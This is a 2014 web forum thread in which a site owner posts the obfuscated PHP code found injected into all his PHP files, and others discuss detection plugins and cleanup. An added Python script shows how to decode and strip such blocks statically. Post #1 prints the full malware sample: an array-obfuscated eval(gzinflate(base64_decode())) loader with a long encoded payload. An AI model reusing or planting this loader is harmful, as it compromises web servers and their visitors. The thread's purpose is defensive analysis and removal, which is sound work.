Malware Alert

Discussion in 'Security' started by AlbCoder, Feb 9, 2014.

  1. #1
    I am unlucky because all the php files in my public_html are infected with the following code:
    <?php
    $md5 = "59f063d5d1a6b701de0b7628b708f1dd";
    $a5 = array("v",";","t",'n',"e",'6',"(",'b','i','c','$','_',"r",'d','l','g',"f",")","o","4","a",'z',"s");
    $b50 = create_function('$'.'v',$a5[4].$a5[0].$a5[20].$a5[14].$a5[6].$a5[15].$a5[21].$a5[8].$a5[3].$a5[16].$a5[14].$a5[20].$a5[2].$a5[4].$a5[6].$a5[7].$a5[20].$a5[22].$a5[4].$a5[5].$a5[19].$a5[11].$a5[13].$a5[4].$a5[9].$a5[18].$a5[13].$a5[4].$a5[6].$a5[10].$a5[0].$a5[17].$a5[17].$a5[17].$a5[1]);
    $b50('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');
    ?>
    Now I found some articles about this code.
    http://stackoverflow.com/questions/7307970/cleanup-php-files-from-virus
    http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html


    EDIT:
    If you have malware on your web hosting and want to remove it, please contact me by writing a mail here

    Thanks
    Last edited: Feb 9, 2014
    AlbCoder, Feb 9, 2014 IP
    Annea likes this.
  2. Annea

    #2
    How did you discover that you had the virus? Was your site acting up? I'm curious, so I know what to look for, how to tell if I have it.
     
    Annea, Feb 9, 2014 IP
  3. RobinInTexas

    #3
    I haven't had to remove any malware, yet :) but this plugin will look for it and it claims to remove the bad code from files where it finds it.
    Anti-Malware
     
    RobinInTexas, Feb 9, 2014 IP
  4. AlbCoder

    #4
    So I was making a new design, a new theme which is mine, and I saw the code in my theme which is made by me, and then I got it. The code which I gave sends information from my server to the hackers and enough. I liked the article on
    http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html
    On all new WordPress sites this is the first plugin which I install, but nothing. It would be nice to delete the code with one command over SSH. Anyway, the best solution is the article which I mentioned above on php-beginners.com
     
    AlbCoder, Feb 9, 2014 IP
  5. AlbCoder

    #5
    Robin, out of curiosity I reused the plugin which you mentioned; please look at the attached screenshot :)
    So the directory is full of that code, but this plugin finds only 0 results.
    If you open this article you will see the list of malware iframes, JavaScripts and the same code as mine, but I think that this plugin doesn't have this virus in its database.
     

    AlbCoder, Feb 9, 2014 IP
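
An added example, not part of any post in this thread and not code from the plugin or the linked articles: a static check that rebuilds the string hidden behind the `$a5[...]` lookups in post #1 without executing any PHP, then flags and strips blocks of that shape, which is a structural match rather than the database lookup that returned 0 results in post #5. The function names, the placeholder payload `QUJD`, the placeholder `$md5` value and the assumption that the injection is a self-contained `<?php ... ?>` block are assumptions of this example.

```python
import re

# Calls that mark a rebuilt string as a decode-and-execute stub.
SUSPICIOUS = ("eval", "base64_decode", "gzinflate")
ARRAY_RE = re.compile(r"\$(\w+)\s*=\s*array\((.*?)\);", re.S)
ITEM_RE = re.compile(r"""(["'])(.*?)\1""", re.S)
BLOCK_RE = re.compile(r"<\?php\s.*?\?>\s*", re.S)  # assumes a closed block

def resolve_hidden_code(php):
    """Rebuild the string concatenated from $arr[n] lookups, without running PHP."""
    m = ARRAY_RE.search(php)
    if not m:
        return None
    name = m.group(1)
    table = [item for _, item in ITEM_RE.findall(m.group(2))]
    # The longest run of $name[i].$name[j]... terms is the hidden function body.
    runs = re.findall(r"(?:\$%s\[\d+\]\s*\.?\s*)+" % re.escape(name), php)
    if not runs:
        return None
    idx = [int(i) for i in re.findall(r"\[(\d+)\]", max(runs, key=len))]
    if any(i >= len(table) for i in idx):
        return None  # malformed or truncated block
    return "".join(table[i] for i in idx)

def find_injected_blocks(text):
    """Return (block, hidden_code) for each PHP block hiding a suspicious call chain."""
    hits = []
    for m in BLOCK_RE.finditer(text):
        hidden = resolve_hidden_code(m.group(0))
        if hidden and any(s in hidden for s in SUSPICIOUS):
            hits.append((m.group(0), hidden))
    return hits

def strip_injected_blocks(text):
    """Remove only the flagged blocks; the rest of the file is left untouched."""
    for block, _ in find_injected_blocks(text):
        text = text.replace(block, "")
    return text

# Constructed sample: the lookup table and index order shown in post #1, with a
# harmless placeholder ("QUJD") where the infected files carry their payload.
TABLE = ["v", ";", "t", "n", "e", "6", "(", "b", "i", "c", "$", "_", "r", "d",
         "l", "g", "f", ")", "o", "4", "a", "z", "s"]
ORDER = [4, 0, 20, 14, 6, 15, 21, 8, 3, 16, 14, 20, 2, 4, 6, 7, 20, 22, 4, 5, 19,
         11, 13, 4, 9, 18, 13, 4, 6, 10, 0, 17, 17, 17, 1]
SAMPLE = ("<?php\n$md5 = \"0\";\n$a5 = array(%s);\n"
          "$b50 = create_function('$'.'v',%s);\n$b50('QUJD');\n?>\n"
          "<?php\necho 'site';\n") % (
    ",".join('"%s"' % c for c in TABLE), ".".join("$a5[%d]" % i for i in ORDER))
```

Run it over copies of the files and diff the result before replacing anything.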
  6. Annea

    #6
    Thx for the info, AlbCoder!

    Re the plugin not finding the malicious code, is it because the hackers are able to make the code "invisible" to the plugin?
     
    Annea, Feb 9, 2014 IP
  7. RobinInTexas

    #7
    RobinInTexas, Feb 10, 2014 IP
  8. AlbCoder

    #8
    I cleaned up my host without the plugin.
     
    AlbCoder, Feb 10, 2014 IP